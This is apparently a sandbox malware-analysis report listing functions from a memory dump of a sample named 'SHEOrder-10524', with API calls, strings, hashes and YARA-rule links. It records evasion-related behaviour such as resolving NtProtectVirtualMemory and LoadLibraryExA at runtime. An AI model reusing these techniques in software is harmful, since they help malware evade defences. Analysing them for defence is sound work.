                                                                                                                                                                    • Opcode ID: 8f53572a1104ec97ec0fc2f886ee5fc50b5644aea07e34caa421cbb0728c90dd
                                                                                                                                                                    • Instruction ID: 0532d32202fa3ba8b218ea94bf017de79071990322372d5bf904effae0a6a5ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f53572a1104ec97ec0fc2f886ee5fc50b5644aea07e34caa421cbb0728c90dd
                                                                                                                                                                    • Instruction Fuzzy Hash: 64413FADA482049B52287B6E740043777DAD745720371A43EB718DB708DFB0FC5E8E2A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D6E94 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 028D6E9A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 028D6EAB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 028D6EBB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 028D6ECB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 028D6EDB
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 028D6EEB
                                                                                                                                                                    • GetProcAddress.KERNEL32 ref: 028D6EFB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                                                    • API String ID: 667068680-2233174745
                                                                                                                                                                    • Opcode ID: 2e928e768aae6192d20edf1fcc51769582f98481c13c348f4249c789a59b9e5f
                                                                                                                                                                    • Instruction ID: 1a05ae1fb983376065480a3405d9f21e80a7195418ae589d3e986215725ef334
                                                                                                                                                                    • Opcode Fuzzy Hash: 2e928e768aae6192d20edf1fcc51769582f98481c13c348f4249c789a59b9e5f
                                                                                                                                                                    • Instruction Fuzzy Hash: BBF09EAC9CB779ADBF007B746C82D2A275DA951648350182DB426E9F42FB78C4284B21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028C28CE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message
                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                                                    • API String ID: 2030045667-32948583
                                                                                                                                                                    • Opcode ID: 4bbb8b04d3936a124e7fd1b0cc0f607496fecf745ea47707c77da9e5325a85ed
                                                                                                                                                                    • Instruction ID: d16e1e0290c5b6153278a2423991aa25a051689e0c641883dc51455bbebea071
                                                                                                                                                                    • Opcode Fuzzy Hash: 4bbb8b04d3936a124e7fd1b0cc0f607496fecf745ea47707c77da9e5325a85ed
                                                                                                                                                                    • Instruction Fuzzy Hash: 8CA1D43CA042688BDB21AA2CCC84B9976E5EB09314F2441E9DD4DDB3CACB75D989CF51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028DA058 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 028DA078
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028DA08F
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 028DA095
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 028DA123
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 028DA12F
                                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 028DA143
                                                                                                                                                                    Strings
                                                                                                                                                                    • C:\Windows\System32\KernelBase.dll, xrefs: 028DA08A
                                                                                                                                                                    • LoadLibraryExA, xrefs: 028DA085
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Read$AddressHandleModuleProc
                                                                                                                                                                    • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                                                                    • API String ID: 1061262613-1650066521
                                                                                                                                                                    • Opcode ID: 6e13afb2d5cd9931d9239f7ce323e0febcd32c2dd9c0b2a79a42914b231ae565
                                                                                                                                                                    • Instruction ID: 29d90815412eec7f7ec0e6aa835022ed0bb88f8f8077431be7a224806c505041
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e13afb2d5cd9931d9239f7ce323e0febcd32c2dd9c0b2a79a42914b231ae565
                                                                                                                                                                    • Instruction Fuzzy Hash: B731837DA40315BBDF24DF68CC81F5AB7ACAF45354F244528FA19EB281E334E9448B61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 028C2849
                                                                                                                                                                    • bytes: , xrefs: 028C275D
                                                                                                                                                                    • The unexpected small block leaks are:, xrefs: 028C2707
                                                                                                                                                                    • 7, xrefs: 028C26A1
                                                                                                                                                                    • Unexpected Memory Leak, xrefs: 028C28C0
                                                                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 028C2690
                                                                                                                                                                    • , xrefs: 028C2814
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                                    • API String ID: 0-2723507874
                                                                                                                                                                    • Opcode ID: 2ac129e020d0d8611efa9cb7bd6d64168e8c03936bdbeff0c6effd9785b62b2c
                                                                                                                                                                    • Instruction ID: 1aa9ae92283e0268be9687c1b39d559dfc50505652fc89c8b5f5715e443acc4e
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ac129e020d0d8611efa9cb7bd6d64168e8c03936bdbeff0c6effd9785b62b2c
                                                                                                                                                                    • Instruction Fuzzy Hash: 9C71943CA042588EDF21AA2CCC84B99B6E5EB09714F2041E9D94DD72CADB75C989CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CBD7C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,028CC047,?,?,00000000,00000000), ref: 028CBDB2
                                                                                                                                                                      • Part of subcall function 028CA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                                                                                    • Opcode ID: e6d97d9c03df75461a499c359ff9a156872aaedab1a9ae984f44deaa5c206f91
                                                                                                                                                                    • Instruction ID: 9ef2b031774bc78cf9abe9926afd6c53f386040b82b7ba716e97f05ab1374bb3
                                                                                                                                                                    • Opcode Fuzzy Hash: e6d97d9c03df75461a499c359ff9a156872aaedab1a9ae984f44deaa5c206f91
                                                                                                                                                                    • Instruction Fuzzy Hash: EE611F3CB011489BDB04EBACD850A9F77B7AB48300F30947DE145EB745CB39D94A8B96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C4320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?,029237C8,?,?,028EB7A8,028C6575,028EA305), ref: 028C4359
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?,029237C8,?,?,028EB7A8,028C6575,028EA305), ref: 028C435F
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F5,028C43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?,029237C8), ref: 028C4374
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,028C43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028C43E7,?,?), ref: 028C437A
                                                                                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028C4398
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                                                                                    • Opcode ID: 89524548537e4e38bae77bb354a2cac189b1f5f144c13ef7aaac1934bb94fe93
                                                                                                                                                                    • Instruction ID: d4cbb99287bf40faf1130da2e3775533530640270d9d82e3d950987c8bd239f5
                                                                                                                                                                    • Opcode Fuzzy Hash: 89524548537e4e38bae77bb354a2cac189b1f5f144c13ef7aaac1934bb94fe93
                                                                                                                                                                    • Instruction Fuzzy Hash: 97F02B6CEC434479FF20A2746C9AF69374C1781B15F34561EB21CD45C387B8C0E84B26
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CAE80 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 028CACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028CAD15
                                                                                                                                                                      • Part of subcall function 028CACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028CAD39
                                                                                                                                                                      • Part of subcall function 028CACF8: GetModuleFileNameA.KERNEL32(028C0000,?,00000105), ref: 028CAD54
                                                                                                                                                                      • Part of subcall function 028CACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028CADEA
                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 028CAEB7
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028CAED4
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028CAEDA
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,028CAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028CAEEF
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,028CAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028CAEF5
                                                                                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028CAF17
                                                                                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 028CAF2D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 185507032-0
                                                                                                                                                                    • Opcode ID: 8869146295693f390181f3fa794d4c5d05377033396299dad13a8f815514c879
                                                                                                                                                                    • Instruction ID: d4f5671a89dddafde3beee48d6aa2f0628ed076e5720a5f504ca6ef89dcef1c4
                                                                                                                                                                    • Opcode Fuzzy Hash: 8869146295693f390181f3fa794d4c5d05377033396299dad13a8f815514c879
                                                                                                                                                                    • Instruction Fuzzy Hash: FE1191BE5582087ED600FB98CC81F9B73EDAB84700F600A3DB254D60E0EB74E9448B27
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CE548 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028CE5E1
                                                                                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028CE5FD
                                                                                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028CE636
                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028CE6B3
                                                                                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028CE6CC
                                                                                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 028CE701
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 351091851-0
                                                                                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                    • Instruction ID: d4083becb654e2e7167a8d0c4cdfb248bd15ea6c93ed9467b7dc00e2cd125011
                                                                                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                                                    • Instruction Fuzzy Hash: AC51E7BD9106299BCB22EB58C890BD9B3BDAF49300F1041E9E509E7212D730EF85CF61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C355C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028C357E
                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,028C35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028C35B1
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,028C35D4,00000000,?,00000004,00000000,028C35CD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 028C35C7
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                                                                                    • Opcode ID: 183d6ecddebbce7404902fabfe18123a10e973492dc552c5073dc0bfc7b03064
                                                                                                                                                                    • Instruction ID: 3a3f663aeae2592cab2a6dc56fb4b25002102e65ae74ad4610c349810386186e
                                                                                                                                                                    • Opcode Fuzzy Hash: 183d6ecddebbce7404902fabfe18123a10e973492dc552c5073dc0bfc7b03064
                                                                                                                                                                    • Instruction Fuzzy Hash: EB01B57DA40218FAEB11DBD09D42FBDB3ECEB08710F6045A9BA14D6680E774D610DB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CAA0C Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,028CAAA3,?,?,00000000), ref: 028CAA24
                                                                                                                                                                      • Part of subcall function 028CA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,028CAAA3,?,?,00000000), ref: 028CAA54
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A958,00000000,00000000,00000004), ref: 028CAA5F
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,028CAAA3,?,?,00000000), ref: 028CAA7D
                                                                                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A994,00000000,00000000,00000003), ref: 028CAA88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread$CalendarEnum
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4102113445-0
                                                                                                                                                                    • Opcode ID: 9a15606c71b030323afcb048fd108e91d4d8f830f2dbce2cbec1817b6f79427f
                                                                                                                                                                    • Instruction ID: 681e6771037da986ff818f65f58c4b70acea2a0c3c863b2b648cfd5247d28788
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a15606c71b030323afcb048fd108e91d4d8f830f2dbce2cbec1817b6f79427f
                                                                                                                                                                    • Instruction Fuzzy Hash: F701DF7D20021C6EF309AE788E12F5A72AEDB85720F714168E510E66C0E778DE104AAA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CAABC Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,028CAC8C,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028CAAEB
                                                                                                                                                                      • Part of subcall function 028CA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Locale$InfoThread
                                                                                                                                                                    • String ID: eeee$ggg$yyyy
                                                                                                                                                                    • API String ID: 4232894706-1253427255
                                                                                                                                                                    • Opcode ID: 2425c55df252c2fd29331bd0da204d98dac1bdbf715899c535a4518af65ee583
                                                                                                                                                                    • Instruction ID: bb68e033b088ba401935b012c54545e7d955b2cd515b9fd7a0312dcf988c8ff2
                                                                                                                                                                    • Opcode Fuzzy Hash: 2425c55df252c2fd29331bd0da204d98dac1bdbf715899c535a4518af65ee583
                                                                                                                                                                    • Instruction Fuzzy Hash: 7441BD3C70450C8BE719AFADC9A42BEB2ABEB85304F74456DE481D7344DB38DD069B22
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028D79FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtProtectVirtualMemory), ref: 028D7A09
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028D7A0F
                                                                                                                                                                    Strings
                                                                                                                                                                    • NtProtectVirtualMemory, xrefs: 028D79FF
                                                                                                                                                                    • C:\Windows\System32\ntdll.dll, xrefs: 028D7A04
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                                                                    • API String ID: 1646373207-1386159242
                                                                                                                                                                    • Opcode ID: 90c45438aad7893845983ef7b5d5d7a2ec5b0d457464c8f7b1e3b1c1098ef310
                                                                                                                                                                    • Instruction ID: cc9588331284542df50a912025818dc9b05af03d4f23af3c9b1f03cd4143516d
                                                                                                                                                                    • Opcode Fuzzy Hash: 90c45438aad7893845983ef7b5d5d7a2ec5b0d457464c8f7b1e3b1c1098ef310
                                                                                                                                                                    • Instruction Fuzzy Hash: 35E0B6BE640209AF9B40EEDCED45D9B77ECAB182007005415BA19D7301D634E9259FB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CC430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,028EA10B,00000000,028EA11E), ref: 028CC436
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028CC447
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                                                                                    • Opcode ID: 7899015e704719417664096a92d4c26e183b0b0ae397832aaf73f172fcbeed5d
                                                                                                                                                                    • Instruction ID: 30703a8a705118fd5ac3f0fe740f7b2ff763d07ec7c02b0c09c07edc06cc2fbb
                                                                                                                                                                    • Opcode Fuzzy Hash: 7899015e704719417664096a92d4c26e183b0b0ae397832aaf73f172fcbeed5d
